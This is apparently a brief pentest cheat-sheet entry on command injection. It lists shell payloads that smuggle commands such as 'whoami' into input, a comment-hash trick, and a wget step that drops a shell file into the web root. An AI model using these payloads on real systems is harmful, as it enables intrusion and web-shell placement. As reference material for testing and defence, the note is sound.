Command Injection
When a web app takes input from an user and executes a command on the host, this can be exploited to run arbitrary commands unless properly sanitized and protected.
; whoami;
&& whoami;
&& wget [shell file] > /var/www/html/shell.php;
# A hash can sometimes clear out commands after the injetion
123)^2))}';whoami;#Out of Bounds Technique
Last updated